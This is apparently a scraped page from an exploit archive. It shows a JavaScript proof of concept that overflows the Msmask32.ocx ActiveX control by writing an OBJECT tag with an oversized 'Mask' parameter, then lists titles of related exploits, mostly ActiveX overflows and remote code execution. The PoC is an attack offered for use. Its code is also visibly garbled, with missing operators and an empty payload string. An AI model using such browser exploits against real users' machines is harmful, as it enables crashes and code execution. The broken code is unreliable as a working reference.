var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i ){buf=buf unescape("");}
document.write(body buf body1);
【Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC】相关文章:
★ Ultra Office ActiveX Control Remote Buffer Overflow Exploit
★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
★ Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)
★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
★ Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
★ Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
★ Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC